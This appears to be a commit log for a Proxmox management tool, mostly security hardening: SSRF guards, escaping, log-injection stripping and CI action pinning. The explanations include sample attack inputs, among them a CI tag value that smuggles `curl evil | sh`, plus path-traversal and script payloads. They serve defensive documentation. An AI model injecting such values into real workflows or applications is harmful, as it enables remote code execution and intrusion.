overwrite-guard in this function also catches the malicious-deps vector at the file-replace stage (defence in depth on top of the hash check). Skipped from those PRs: ─ #489's pull-request payload was code-correct, just lacked the `_replace(path=...)` query/fragment scrub on the new path which this version adds. ─ #473 had +160 lines of PENTEST_FIX_UPDATE_INTEGRITY.md + 20 lines of SECURITY.md narrative — those are repo-pollution, not shipped. The version.json `archive_sha256` schema-add is a release-cut task (do at next tag, not on every Testing-side hotfix). Both PRs being closed with a pointer to this commit. * revert: drop SHA256 update-integrity port from 203f957 — wrong threat model Nico flag: pegaprox is distributed from GitHub `archive/main.tar.gz`, which is NOT a stable artifact — GitHub repackages periodically (gzip compression changes, file ordering shifts) so the SHA256 of the tarball moves even when the underlying commit doesn't. version.json can only carry one hash at a time, and we don't push to main on every update that would refresh that hash. Net effect of the port: every update would fail with `hash mismatch` until someone refreshed the hash manually, on what's already a rolling distribution. Also walking back `requirements.txt` in PROTECTED — that block prevents overwrite during update (via `is_protected(rel_path)` at settings.py line 507/566). Adding requirements.txt to the list means legitimate dep-version bumps in a release would silently skip the install side, leaving operators on stale pinned packages and confused about why a new feature's deps aren't there. The threat model the original PR was defending against — "tampered archive injects malicious requirements.txt that pip then executes" — is real only if an attacker controls the archive source. For us that's the GitHub repo itself, and if an attacker has push there, requirements.txt is the least of our worries. Keeping the #489 vmware SSRF port from the same commit — that one was defence-in-depth on already-hardcoded callers, no breakage risk. The right path for update-integrity, if we want it later, is: ─ Sigstore / cosign signatures on tagged release archives (CI-attestable, doesn't require static hash files) ─ OR ghcr.io image verification for docker users (cosign signed images, most distros' default workflow anyway) Neither belongs in a hotfix. * security: SSRF guard on OIDC test endpoint, vmware api_post/api_delete, status_page XSS hardening Manual port of three Aikido autofix PRs (#490, #491, #492). Bundled because they're all defense-in-depth at the SAST level; no functional change. - pegaprox/api/auth.py — oidc_test_connection() now runs sanitize_outbound_url() on endpoints['authorization'] (Step 2) and endpoints['jwks'] (Step 3) before hitting requests.get(). Same pattern as utils/oidc.py:159/304/453; honours the existing oidc_allow_private_ip toggle so on-prem Authentik/Keycloak realms don't break. Discovery-phase guard at utils/oidc.py:159 already covered the issuer URL itself — this closes the case where discovery succeeds but the published .well-known doc points its auth/jwks at internal IPs. - pegaprox/core/vmware.py — api_post() and api_delete() now run _build_validated_url() (added in 203f957). Closes the gap I missed when porting #489: api_get() was wrapped but the POST/DELETE callers were not. Path traversal (/../ and /%2e%2e/) gets rejected with {'error': 'invalid path: ...'} the same way api_get() does. - plugins/status_page/__init__.py — _update_config() now int-clamps pbs_stale_hours (1-8760, default 48) and refresh_interval (5-3600, default 30) before persisting. status.html renders these as text via escapeHtml, but the clamp is defence-in-depth so a future template change that drops escapeHtml can't leak a stored payload. - plugins/status_page/status.html — _stripDangerousNodes() now catches namespaced attribute variants (xlink:href, ev:href, …) carrying javascript:/data:/vbscript: payloads. Plus escapeHtml(String(...)) on the one remaining render-line that interpolated pbs_stale_hours directly. Unit + E2E verified against localhost:5000: - vmware path validator: 6/6 (valid path / /../ / %2e%2e/ / missing slash / api_post traversal / api_delete traversal) - OIDC SSRF guard: 4/4 E2E (loopback reject, file:// reject, empty reject, google.com flow accepts past new Step 2 + Step 3 with status:ok) - status_page clamp: 5/5 E2E (<script> payload → 48, "abc" → 30, 0 → 48, 99999 → 48, valid 72/60 persisted) - status.html delivery: HTTP 200, patched JS present, HTMLParser clean * security: HTML-escape alert email payloads + strip CR/LF from audit log lines Manual port of two Aikido autofix PRs (#493, #494). Bundled — both are output- neutralisation fixes against attacker-controlled strings reaching a structured stream (HTML email / text log). pegaprox/background/alerts.py — three email templates now run user-controlled fields through html.escape() before they hit the HTML body: 1. check_and_send_alerts() — alert_name/target_name/target_type/metric/ operator (rule definitions are admin-editable but the alert engine also accepts target names from the manager state, which mirrors PVE VM/node names — an attacker who can name a VM "<script>..." would otherwise inject script into the on-call recipient's mail client). 2. check_update_available_alert() — escapes latest version + release date + each changelog line + download_url. The update server is trusted today, but if the mirror is ever compromised, the release-notes path is exactly where an attacker could drop a payload that runs in the admin's mail client. 3. _emit_node_status_event() — same shape, plus rename the local `html` variable to `html_email` so it doesn't shadow the `html` stdlib import we now rely on. The `html` module is imported as `html_lib` to avoid the shadowing trap across the whole file. Numeric fields (threshold, current_value) flow through `:.1f` format specs which already coerce them safely; left unescaped. pegaprox/utils/audit.py + pegaprox/utils/sanitization.py — new sanitize_log_message() helper (Layer 2), called by log_audit() against user/action/details/cluster before writing the text log line. Strips CR (\r), LF (\n), and the unicode line separators U+2028/U+2029. Tabs left intact (legitimate inside some action strings). The structured DB row keeps the raw value — sanitisation only applies to the text stream. CWE-117 / OWASP Log Injection. Defense against an attacker submitting a username like "alice\nAudit: admin - deleted_all - faked" that would otherwise produce a second fake-looking audit line. Verified: - log_audit unit-test: CR/LF/U+2028 in all 4 fields → single-line output, no separators surviving; DB write path called with raw values - alerts.py HTML-render unit-test: HTML-parser sees only template tags (<h2>, <p>, <table>, <tr>, <td>); zero <script>/<img>/<svg>/<iframe> surface from payloads in 7 user-controlled fields - import smoke: both modules + audit + sanitization import clean - live server: running pegaprox audit-logs continue to fire normally ("Audit: pegaprox - user.logout - User logged out") * fix: site-recovery — allow re-running planned/emergency from completed/failed (#413 layer 5) The atomic transition `WHERE status = 'ready'` rejected every subsequent attempt after the first successful failover. blackshocks' support bundle made it clear: VM 104 went through qmigrate OK at 14:13:58 and his next click came back as a 409 with the (very) misleading "concurrent failover may be in progress". Nothing concurrent — the plan was just no longer in 'ready'. Expanded the WHERE set to ('ready', 'completed', 'failed') in both execute_failover() (planned) and execute_emergency_failover(). The 'running' / 'testing' branches still hit the early-return at the top of each handler, so concurrent-call protection is unchanged. Replaced the ambiguous race-detection message with one that names the actual state so operators know what they're looking at. Test failover already worked because its UPDATE has no status filter; this brings planned + emergency in line with that behaviour. E2E (Flask test-client with mocked cluster managers + _safe_spawn_failover patched to no-op so the worker doesn't actually run): planned + emergency, plan state → ready → 200, status=running (unchanged) completed → 200, status=running (was 409 — fixed) failed → 200, status=running (was 409 — fixed) running → 409 "already in progress" (unchanged, top-of-handler) testing → 409 with named state (was 409 race-msg — clearer) * security: API-token role-refresh + SSH-WS SSRF + cross-cluster BOLA (CodeAnt May) Three CodeAnt findings, one validated-and-patched batch. All three are chained: closing the SSRF makes the BOLA mostly moot, but I still went through and bound the WS token to a cluster scope for defense-in-depth. 1) CWE-269 — pegaprox/utils/auth.py require_auth() (~line 834) API-token sessions had their role silently refreshed to the owner's current DB role on every request. An admin creating a 'viewer' token for CI/CD got an admin token back — the role assigned at creation was overwritten by user.get('role'). Fix: when session['api_token']=True, keep the token-bound role and *cap* it at the user's current role (min(token, user)) so a demotion still applies. Session auth still refreshes from the user record as before. 2) CWE-918 — pegaprox/api/vms.py inline server_script (shell handler + termproxy_handler) The SSH-WS server had two SSRF surfaces: - ?ip=<URL-query> was used as node_ip without validation when present - creds.host=<JSON> overrode node_ip unconditionally Either path let an authenticated user turn PegaProx into an SSH jump host into arbitrary internal IPs. Fix: always resolve cluster-creds, build allow_hosts = {cluster_host} ∪ node_ips.values(), require both the prefetched and the override IP to be in that set. Empty set (cluster-creds totally failed) rejects everything. Same gate added to termproxy_handler against pve_host query param. 3) CWE-285 — pegaprox/api/realtime.py /api/ws/token/validate + pegaprox/api/vms.py inline server_script WS tokens were issued without cluster scope and the validate endpoint only checked existence/expiry. The SSH-WS server now passes ?cluster_id=<id> from the request URL to the validate call. Validate runs check_cluster_access against the token user (with VM-ACL fallback). cluster_id is optional for back-compat with VNC callers in vms.py that haven't been updated yet. The .ssh_ws_server.py file is generated at runtime by pegaprox/api/vms.py (write to disk + spawn subprocess). Both the inline source and the regenerated artefact are committed for consistency with prior history. E2E verified against localhost:5000 + ssh-ws on :5002: - viewer-token → GET /api/users (admin-only) → 403 (was 200 pre-fix) - viewer-token → GET /api/clusters (viewer-allowed) → 200 (no regression) - WS-token validate ?cluster_id=allowed → 200 - WS-token validate ?cluster_id=disallowed → 403 with named state - WS-token validate ?cluster_id missing → 200 (back-compat preserved) - WS-token validate ?cluster_id=disallowed but user in VM-ACL → 200 - SSH-WS ?ip=10.99.99.99 (forged) → close 1008 "not a known node" - SSH-WS creds.host=10.99.99.99 → close 1008 "Manual override blocked" * security: kill plain-JSON config fallbacks — encrypted DB is the single source of truth After the v0.9.10 SQLCipher migration the legacy plain-JSON files in config/ should never be re-read at runtime — anything sensitive only exists in the encrypted DB now. The leftover fallback paths (kept "for backwards compat") quietly re-introduced a plain-text spill if the DB ever failed to load. Worse, the SSH-WS Method 2 fallback ran on *every* shell connection, looking for clusters.json in seven locations including a stale absolute path from a different operator's deployment. Removed runtime fallbacks (DB-failure path → defaults, not legacy JSON): - pegaprox/core/config.py _load_config_legacy() — kept Fernet-encrypted .enc branch (defense-in-depth, already encrypted), dropped plain CONFIG_FILE - pegaprox/utils/rbac.py load_tenants() — dropped TENANTS_FILE branch - pegaprox/utils/rbac.py load_custom_roles() — dropped CUSTOM_ROLES_FILE branch - pegaprox/api/storage.py _load_esxi_config() — dropped ESXI_CONFIG_FILE branch - pegaprox/api/storage.py _load_storage_clusters_config() — dropped STORAGE_CLUSTERS_FILE branch - pegaprox/api/helpers.py load_server_settings() — dropped SERVER_SETTINGS_FILE branch - pegaprox/api/vms.py inline ssh_ws_server (+ regenerated .ssh_ws_server.py) — dropped Method 2 (config/clusters.json on seven paths including a stale absolute /home/admin_321/... path). Method 1 (cluster-creds API) stays as the only legitimate source. If it fails the shell connection fails — fixing the cluster config is the right recovery, not a plain-JSON spill. KEPT (one-shot migration code in core/db.py): - _migrate_clusters reading CONFIG_FILE - _migrate_alerts reading ALERTS_CONFIG_FILE - _migrate_server_settings reading SERVER_SETTINGS_FILE - These run once per upgrade and are the only legit reason to touch the legacy files. They stay. Constants in pegaprox/constants.py (CONFIG_FILE / TENANTS_FILE / etc.) are unchanged because the migration code still references them. Verified by planting poison plain-JSON files (evil-cluster, EVIL_ROLE, evil-tenant, evil_setting) in config/ and forcing get_db() to raise across the 5 load functions — all 5 returned defaults/empty rather than picking up the poison. Cleanup removed the planted files. Existing DB-backed loads still return real data (3 users, 4 clusters, 1 tenant) on the live server. Net: 6 files, +36 / -112 lines. * fix: cluster-creds session attach + WS-token validate carries cluster context Two related fixes pulled out of the post-cleanup E2E sweep: 1) get_cluster_creds_internal (auth.py:1141) was raising AttributeError because check_cluster_access reads request.session['user'] — a slot normally populated by @require_auth(). This endpoint does its own cookie-based session validation (no decorator) and never attached the resolved session to the request, so every call after the March 2026 commit f8c12d54 returned 500 instead of doing the access check. The SSH/VNC shell flow depends on this endpoint, so the failure was silently degrading multi-node deployments via the now-removed clusters.json fallback. Fix: attach the session to request after validation, before check_cluster_access runs. 2) After dropping Method 2 (plain-JSON fallback) the SSH-WS subprocess was stuck — its ws-token doesn't authenticate against the cluster- creds endpoint (no session cookie), and Method 1 returned 401 every time. Extended /api/ws/token/validate to optionally return `cluster_context = {host, node_ips, ssh_port}` when called with ?cluster_id=. The SSH-WS shell + termproxy handlers now read that directly instead of doing a second authenticated round-trip. Stays lightweight — pulls only what's already cached on the manager (cluster.host + config.fallback_hosts + config.ssh_port). No network probe; validate stays sub-200ms even when _get_node_ip would otherwise stall for ~15s on the first cold call. E2E: HAPPY PATH: ws://…/shellws?token=… → server resolves cluster.host (allowManualIp:false) LEGIT IP: ws://…/shellws?token=…&ip=fallback → accepts (allow-list match) FORGED IP: ws://…/shellws?token=…&ip=10.x.x.x → close 1008 HOST OVERR: creds.host=10.x.x.x → close 1008 CROSS-CL: ws://…/clusters/FAKE-… → allowManualIp:true but allow-list empty → all overrides rejected Multi-node clusters where the frontend prefetches an IP that's not in the manager's fallback_hosts list will fall through to manual-entry mode. The right follow-up (cheap node_ip cache exposed to validate) is parked for a separate change — out of scope for the cleanup. Prior fixes verified still in place: - viewer API-token → /api/users → 403 (CodeAnt CWE-269 holds) - OIDC test connection to google.com → all 6 steps OK (CWE-918 SSRF gate) - status_page pbs_stale_hours="<script>" → clamped to 48 * update_files: add worldmap.js + world-countries.svg to manifest Both shipped on disk via the GitHub archive after the worldmap feature landed in 5b0a1b5 but were never added to the per-file update_files list. Same trap as the December v0.9.9.1 incident with dr_drill.py / hello_world example plugin / theme-aware logo set — when the updater falls through to the file-by-file fallback (mirror 404 / archive download glitch), missing manifest entries leave a customer with a partial install. WorldMap would have failed to render with the sidebar entry pointing at a 404 JS file. Two new entries: web/assets/world-countries.svg — slotted into the existing alphabetical web/* section (first web/assets/ entry) web/src/worldmap.js — after vnc_secure_socket.js, before sw.js Manifest now lists 227 files (was 225). No version/build bump — manifest fixup, not a code change. The pre-release CI check from v0.9.9.1 should have caught this; will investigate why it didn't on the next release cut. * security: aikido batch 2026-05-30 — 4 manual ports, 9 PRs rejected/closed Reviewed 13 Aikido autofix PRs opened around 10:00 UTC. Six against Testing, seven against main. Two carried broken `allowed_domains = ["example.com"]` placeholder allow-lists that would have broken push notifications and XCP-ng migrations outright; one against main had a syntax error (`print(f\"...\")`); one removed `verify=False` on a PVE call that has to tolerate Proxmox's default self-signed certs. Closed all 9. The four valid ones are ported here verbatim against Testing: #504 pegaprox/api/auth.py oidc_test_connection now uses the URL returned by sanitize_outbound_url() rather than the raw input — that way the outbound request hits exactly what the guard validated (the helper normalises the URL via urlparse + re-encode). Micro fix, both Step 2 and Step 3 of the test. #500 pegaprox/utils/oidc.py New build_validated_discovery_url() pre-checks scheme / hostname / path-traversal on the admin-supplied authority *before* composing the discovery URL. The existing sanitize_outbound_url() guard further down catches the same family of attacks one step later — this fails fast with a structured `_error_detail` instead of letting a malformed authority reach any I/O. get_oidc_endpoints surfaces `invalid_authority_url` on rejection so the UI shows a clean message. #502 pegaprox/core/xcpng.py Two defensive URL builders (`_build_xapi_import_vdi_url`, `_build_xapi_rrd_url`) replace the raw f-strings in upload_to_storage (line 2576) and _rrd_fetch (line 2621). host_url is server-derived from cluster config so direct SSRF was a stretch, but pre-validating session_id / vdi_uuid / rrd_path keeps the surface clean if a future caller starts passing externally-influenced values. #507 pegaprox/core/manager.py realpath/commonpath gate on four HA recovery file ops: _ha_check_node_ agent_heartbeat (read), _ha_write_poison_pill (write), _ha_wait_for_ poison_ack (read), _ha_acquire_recovery_lock (read + write). Files are written/read by us today but the path-traversal vector goes live the moment a node-name expression slips into the path-build code. Defence in depth. E2E: - Unit-tests: 9/9 (path-traversal / bad scheme / bad VDI / bad RRD path all rejected; valid public URL accepted; trailing slash handled) - HTTP: OIDC test on google.com all 6 steps OK (new validated_auth_url + validated_jwks_url paths fire and the response uses the normalised URL) - HTTP: OIDC test with `https://idp/../etc/passwd` rejected at the new 'Endpoint Resolution' step with structured detail - Regression: API-token role-refresh fix still 403, worldmap SVG still 200, no new ERROR/Traceback in boot log (the existing XCP-ng XAPI 302 redirects predate this change) PRs closed (commented + closed separately): #495, #496, #497, #498, #499, #501, #503, #505, #506. * ux: sort CPU type dropdown — host first, max second, rest alphabetical Two surfaces hit the same problem: - pegaprox/core/manager.py — get_cpu_types() returned the raw PVE enum order (host/kvm64/kvm32/qemu64/qemu32/max/x86-64-v2/Broadwell/Cascadelake/EPYC/…) which is the order PVE built the C enum in, not anything an operator finds useful when scrolling through 60+ models. New _sort_cpu_types pins `host` (the default we set on every new VM) and `max` at the top, then sorts the rest alphabetical (case-insensitive so `athlon`/`Broadwell`/ `core2duo` interleave the way a human reads them). - web/src/create_modals.js — VM Create modal had its own hardcoded ~60- entry array in PVE enum order, unrelated to the backend list. Reshaped to use the same head-then-alpha pattern via an IIFE so the dropdown in Create matches the dropdown in Config now. While here, fix a passive-listener console-spam in worldmap.js — the zoom-on-wheel handler called e.preventDefault() inside React's onWheel synthetic prop, which since React 17 registers as passive, so every wheel event logged "Unable to preventDefault inside passive event listener invocation" to the browser console (saw ~30 in a row in Nico's paste). Switched to a useEffect that attaches via addEventListener with {passive: false} on the container ref + a function-ref so the closure sees the latest vbW/vbH/vbX/vbY without rebinding the listener on every zoom. E2E: - _sort_cpu_types unit-tests: 7/7 (typical static / live shape / no host / no max / empty / dupes / case-insensitive interleave) - GET /api/hardware-options on the lab cluster: 94 cpu_types returned, host first, max second, rest sorted casefold ✓ - Compiled web/index.html: cpuTypes IIFE present, worldmap wheel listener attached via addEventListener {passive: false} * feature: Add PVE node subscription management (#508) * Add link to Plugins in README * feature: Add PVE node subscription management Adding centralized subscription management for PVE nodes of a selected cluster. Allowing management (add, view, delete) of subscriptions within the datacenter chapter. --------- Co-authored-by: Nico Schmidt <77726945+MrMasterbay@users.noreply.github.com> * Create release-images.yml * fix(#508): mask subscription key in cluster-wide aggregator + clusterId dep on lazy sections Two CodeAnt findings on the subscription-management merge. api/datacenter.py — get_datacenter_subscriptions is gated by cluster.view (read-only role), which meant every read user could hit one URL and walk away with the license key for every node in the cluster. PVE itself gates subscription detail behind Sys.Audit, so matching that intent. New _mask_subscription_key helper redacts everything except the last four characters in the aggregator response. The per-node read (/nodes/<n>/subscription, node.view) still returns the raw key so the rotation flow that already exists keeps working unchanged; admin.settings is still what gates the writes. web/src/datacenter.js — the useEffect that lazy-loads ceph / metric- server / subscriptions only depended on activeSection, so switching clusters while parked on one of those tabs left stale node rows from the previous cluster on screen. Added clusterId to the dep list. Same useEffect handles all three lazy sections, so the fix covers ceph and metric-server too. Verified _mask_subscription_key on a 28-char PVE-style key (24 dots + last 4), short keys (≤8 chars) passed through unchanged, None/'' return ''. Frontend rebuilt — compiled index.html carries [activeSection, clusterId] now. * fix(#509): make SQLCipher cipher_memory_security env-controlled with smart auto davinkevin reported sqlcipher_mlock warnings flooding the container log ~2 lines / second on a default k3s install. Root cause: the bundled sqlcipher3-binary wheel compiles with memory-security on, mlock(2) needs root or CAP_IPC_LOCK or a fat RLIMIT_MEMLOCK, and a default non-root container has none of those — the lock fails with ENOMEM on every connection open and writes a WARN line. The at-rest encryption is unaffected; only the in-memory page cache stops being pinned. New env knob (pegaprox/core/dbcrypto.py): PEGAPROX_CIPHER_MEMORY_SECURITY=auto default; heuristic decides PEGAPROX_CIPHER_MEMORY_SECURITY=on force-enable (bare metal / root) PEGAPROX_CIPHER_MEMORY_SECURITY=off force-disable (rootless containers) The auto path treats `os.geteuid() == 0` as "mlock will work" and otherwise probes `RLIMIT_MEMLOCK` — needs a soft limit of at least 8 MiB to call mlock viable. Both _resolve_memory_security_setting() and _mlock_likely_works() unit-tested with the env-var matrix; live DB connect verified that `PRAGMA cipher_memory_security = OFF` returns the expected 0 and that the existing sqlite_master smoke read still passes (139 rows on the dev DB). Schreibtisch docs.html updated in the Docker Deployment section: env var added to the table, plus a new Kubernetes / k3s / rootless block explaining the symptom, the threat-model nuance, and the rlimit / securityContext workarounds for operators who'd rather keep the mlock active. * fix(logging): demote per-node status line from info to debug (PR #510) davinkevin filed PR #510 against main pointing this out: get_node_status logs a per-node `CPU X%, RAM Y%, Score Z, Status: online` line at INFO on every poll. On a 5-cluster × 6-node fleet at the default poll interval that's ~720 lines/h of routine metrics carrying no actionable signal — floods stdout, k8s log collectors, journald. Per-node metrics are still available in the web UI + in-memory history buffer + `/api/metrics` exporter, so the log line is redundant at INFO. WARNING/ERROR paths (HA, offline, drift) are untouched. Operators who want the per-tick line back can flip PEGAPROX_LOG_LEVEL=DEBUG. Ported from PR #510 (targeting main) onto Testing — line had moved from 1413 to 1433 since davinkevin's branch was cut, so a straight merge wasn't clean. Co-authored-by: Davin Kevin <davin.kevin@gmail.com> * security: SHA512-verify Debian cloud image in release-images.yml (mirror of b6c7f9e on main) Same supply-chain fix that just landed on main (b6c7f9e) applied here too, so the next Testing → main merge doesn't bring the unverified wget back and the workflow on both branches stays in sync. Identical logic — only the resize size differs: Testing carries `qemu-img resize pegaprox.qcow2 8G`, main carries `20G`. That divergence predates this change. * security: pin all 3rd-party actions + template-injection fix (CodeAnt #511 + #512) Two CodeAnt findings on Testing, ported together because they touch the same workflows and "pin one action while the other six float on a moving tag" looked worse than no pinning at all. #511 — release-images.yml `prepare/ver` step interpolated ${{ github.event.release.tag_name }} and ${{ inputs.tag }} directly into the `run:` shell script. The interpolation happens before the shell sees the value, so a tag like `'; curl evil | sh; #` would escape into the script. Only repo-write users can push tags or dispatch the workflow, so external exploitability is zero, but the pattern is a textbook CI escape. Switched to `env:` block + `"$RELEASE_TAG_NAME"` shell-var reads. #512 — Aikido's PR pinned only `actions/upload-artifact@v4` and left the six other 3rd-party refs (`actions/checkout`, the five `docker/*-action`s, `actions/download-artifact`, `softprops/action-gh-release`, `actions/github-script` in issue-validator) on moving major-tags. Pinning one but not the others is the worst of both worlds — release-build is still vulnerable to a re-tag of any of the unpinned six. Pinned every 3rd-party action across all three workflows to the latest commit SHA in the currently-used major version. Tag is in the trailing comment so dependabot / renovate can bump these via PR without humans hunting SHAs. SHAs resolved from `gh api repos/<owner>/<repo>/git/refs/tags/<tag>` at 2026-05-30 21:10 UTC; majors held at v4/v3/v5/v7/v2 to avoid sneaking a breaking upgrade into a security commit. actions/checkout v4 → v4.3.1 34e114876b0b11c390a56381ad16ebd13914f8d5 actions/upload-artifact v4 → v4.6.2 ea165f8d65b6e75b540449e92b4886f43607fa02 actions/download-artifact v4 → v4.3.0 d3f86a106a0bac45b974a628896c90dbdf5c8093 actions/github-script v7 → v7.1.0 f28e40c7f34bde8b3046d885e986cb6290c5673b docker/setup-qemu-action v3 → v3.7.0 c7c53464625b32c7a7e944ae62b3e17d2b600130 docker/setup-buildx-action v3 → v3.12.0 8d2750c68a42422c14e847fe6c8ac0403b4cbd6f docker/login-action v3 → v3.7.0 c94ce9fb468520275223c153574b00df6fe4bcc9 docker/metadata-action v5 → v5.10.0 c299e40c65443455700f0fdfc63efafe5b349051 docker/build-push-action v5 → v5.4.0 ca052bb54ab0790a636c9b5f226502c73d547a25 softprops/action-gh-release v2 → v2.6.2 3bb12739c298aeb8a4eeaf626c5b8d85266b0e65 * release: bump to v0.9.12.0 (build 2026.05.30) — Testing only, no tag yet All five surfaces aligned per the version-bumping checklist: pegaprox/constants.py PEGAPROX_VERSION = "Beta 0.9.12.0" / PEGAPROX_BUILD = "2026.05.30" web/src/constants.js PEGAPROX_VERSION = "Beta 0.9.12.0" version.json version=0.9.12.0 build=2026.05.30 release_date=2026-05-30 README.md version badge → 0.9.12.0-beta web/index.html rebuilt — PEGAPROX_VERSION="Beta 0.9.12.0" version.json changelog gets a new top entry summarising the v0.9.12.0 train (vacation R3 wrap-up): #509 davinkevin SQLCipher mlock heuristic, #510 davinkevin per-node-status info→debug, gyptazy PRs #429 (ACME DNS-01) + #508 (PVE subscription management with key-mask), #413 blackshocks SR layer 5, the CodeAnt batch (API-token role-refresh, WS cluster scope, SSH-WS SSRF, vmware path-traversal, OIDC discovery pre-validation, subscription-key mask, useEffect clusterId dep), the Aikido May-30 batch (3rd-party action SHA pinning, template-injection, Debian cloud-image SHA512 verify), plain-JSON config fallback removal, CPU dropdown sort, worldmap wheel passive-listener fix, first-run setup wizard, alert-email html-escape, audit-log CRLF strip, ACME directory SSRF guard, version.json worldmap-files manifest gap. No tag, no GitHub release cut — that decision is yours. Testing-only push so the build line on dev installs flips to 0.9.12.0 today; the mirror upload + docs.pegaprox.com pass still pending until you give the release-cut OK. * sr: create_api_token retries past stale 'Token already exists' #413 layer 6 (blackshocks 20260530_220647 bundle): Planned Failover fails on cl2 with PVE "Parameter verification failed" / "Token already exists" — the same 'pegaprox-sr' token from a prior failover attempt was still on the target user, so the create POST was 400 before any qmigrate could run. Failback hits the same wall in the opposite direction. create_api_token now detects the 'already exists' response, DELETEs the stale token, and retries the create exactly once. The existing _delayed_cleanup grace path stays — this just makes the front of the call idempotent. - MK * monitoring: SMART data viewer modal (replaces alert(JSON)) Node detail → Disks tab → SMART button used to alert(JSON.stringify()) the raw payload, which was useless for actually triaging a sketchy disk. New SmartModal component renders parsed PVE smartctl output: - Health badge (PASSED / FAILED / N/A with colour) - NVMe detail block (temp, wear-%, power-on h, power cycles, unsafe shutdowns, media errors - latter red on >0) - SATA/SAS key-attributes table (Reallocated_Sector_Ct, Pending, Temperature, Power_On_Hours, Wear, Uncorrect) - raw count >0 on the pending/reallocated rows lights red - "All attributes" collapsed below + raw JSON dump at the very bottom for SMART nerds Modal is keyed on the disk row's row-action so existing list/ button wiring stays. Closes on ESC via outer-div click. - LW * monitoring: per-NIC traffic + error/drop counters Node → Network tab now carries a second table under the existing bridge/bond config list: Interface Statistics, one row per NIC from /proc/net/dev (SSH, /api/clusters/<id>/nodes/<n>/netstats). Columns: RX bytes / packets / errs / drop, TX bytes / packets / errs / drop / collisions. Non-zero err/drop/coll cells render in red so a flapping uplink jumps out. PVE's REST surface has aggregate /rrddata netin/netout but never per-NIC errors — this is the one stat operators always end up SSHing for when chasing dropped packets, so we may as well do it once and surface it cleanly. Falls back to a silent hide on the loopback iface (lo never has interesting numbers anyway). - MK * monitoring: top-N noisy neighbors on Insights tab New /api/clusters/<id>/insights/top-talkers endpoint sorts the cluster's VMs by a chosen metric (cpu | memory | disk_usage | disk_io | net_io) and returns the top N. Pure aggregator over /cluster/resources, no history table needed. CPU / Memory / Disk usage are PVE's instantaneous percentages (cpu_percent etc.). Disk I/O and Net I/O sort by cumulative diskread+diskwrite / netin+netout since VM boot — that's the "which VMs have moved the most data" proxy for noisy-neighbour triage. For instantaneous rates we'd need RRD deltas; not the ask here. Frontend: new Top Talkers card on the Insights tab between Capacity Forecast and Right-sizing, with metric selector and the picked column highlighted. Defaults to CPU on tab open. - MK (backend) - LW (UI) * i18n: monitoring expansion strings across DE/EN/FR/ES/PT/KO/IT 84 strings (12 new keys × 7 langs) for the Top Talkers card, Interface Statistics table and SMART modal that landed in 629c19c / 384e8ed / 75f6e58. The `|| 'English fallback'` in the JSX still works for any key we missed, but having the real translations means DE/FR/ES/PT/KO/IT actually shows in those locales instead of the English fallback. New keys: topTalkers, topTalkersHint, cpuPercent, memoryPercent, diskUsagePercent, diskIo, netIo, runningVms, interfaceStatistics, errOrDropHint, keyAttributes, allAttributes. - LW * monitoring: SMART modal accepts 'OK' health (not only 'PASSED') E2E test on a QEMU virtual disk showed health='OK' (from PVE's SCSI/QEMU wrapper) which my colour-bucket logic put into the yellow "unknown" tier. SATA disks usually return 'PASSED', SCSI sometimes 'OK', actual failure is 'FAILED'. Case-insensitive now, both PASSED and OK go green. - LW * monitoring: enrich /guest-info with NICs / FS / users / clock-skew Existing /guest-info kept the same hostname/os/kernel/ip_addresses fields (so the legacy summary table renders unchanged), and adds: - kernel_version: full uname-style string (was only kernel-release) - interfaces[]: per-NIC {name, mac, ips:[{address,family,prefix}]} - filesystems[]: real used/total per mountpoint with used_pct, mirrored from /guest-fsinfo so the detail panel does one round-trip instead of two - users[]: QGA get-users — logged-in sessions for security context ("who's on this VM right now") - guest_time_ns: guest clock in ns since epoch — ntp sanity check Short-circuits on 500 + "not running" after the first call so an agent-less VM doesn't burn 6 round-trips. Each block in its own try/except so a single QGA quirk doesn't kill the whole payload. Frontend: VM detail panel's Guest Agent section adds a <details> expander below the existing summary table with three sub-blocks (Filesystems / Interfaces / Users) plus a clock-skew line. Green / yellow / red on FS fill > 75% / 90%, and on clock drift > 5s / 60s. i18n: 35 new strings across DE/EN/FR/ES/PT/KO/IT for guestDetail, loggedInUsers, clockSkew, filesystems, interfaces. The "users" key already existed everywhere — left alone. - MK (backend) - LW (UI) * monitoring: cluster-health panel (corosync rings + pvecm + services) New /api/clusters/<id>/nodes/<n>/cluster-health endpoint SSHes the node and runs: - corosync-cfgtool -s → ring ID, address, status, node count - pvecm status → quorate, votes, cluster name, config version - systemctl show <svc> → ActiveState/SubState/since/Result for pveproxy, pvedaemon, pve-cluster, corosync, pvestatd Each block in its own try/except so a single command failure doesn't nuke the whole payload — operators chasing a half-broken cluster get partial data instead of nothing. Errors surface via the standard {error:...} shape we use for the other SSH-backed endpoints. Frontend: Node detail → System tab now leads with a Cluster Health panel: - quorum status (green if "Yes", red otherwise) - per-ring table with status colour - 5-card service grid with active/sub state + since timestamp coloured by ActiveState (green=active, yellow=in-between, red=failed) i18n: 28 new strings across DE/EN/FR/ES/PT/KO/IT for clusterHealth, quorum, corosyncRings, address, services, since etc. Several keys (nodes, votes, clusterName, since) already existed and were left. - MK (backend) - LW (UI) * monitoring: lm-sensors panel (temp / fan / volt) New /api/clusters/<id>/nodes/<n>/sensors endpoint SSHes the node and parses `sensors -j`. Flattens the lm-sensors JSON ({chip: {sensor: {tempN_input: ...}}}) into a list of {chip, label, kind, value, max, crit, alarm} rows. Frontend: Sensors card at the top of System tab, table with chip / sensor / value / max / crit / alarm columns. Coloring: - value >= crit OR alarm flag → red - value >= max → yellow - otherwise → default Hidden on hosts without lm-sensors (returns error string the UI skips rendering for). i18n: 21 new strings across DE/EN/FR/ES/PT/KO/IT for sensors, sensor, sensorsHint. The "value" key already existed and was left. - MK (backend) - LW (UI) * monitoring: per-tag / per-pool rollups on Insights tab New /api/clusters/<id>/insights/rollups?group_by=tag|pool endpoint aggregates the cluster's VMs by tag or by Proxmox pool. Returns one row per group with vm_count, running_count, summed cpu_percent, mem_used/max + pct, disk_used/max + pct, cumulative disk + net I/O bytes. VMs with multiple tags count in EVERY tag's rollup — that's the useful semantic (the 'prod' tag should include VMs also tagged 'critical'). VMs with no tag fall into '(untagged)'. Pool grouping gives VMs without a pool the '(no pool)' bucket. Frontend: Insights tab gets a Rollups card between Top Talkers and Right-sizing, with By-Tag/By-Pool selector. Table shows group key, VM count + running count, Σ CPU%, RAM%/Disk% (with absolute bytes on hover via title attr), cumulative net I/O. i18n: 49 new strings (~7 keys × 7 langs) for rollups, byTag, byPool, noGroupings, rollupsHint. The "tag", "pool", "tags", "running" keys already existed across langs and were left untouched. - 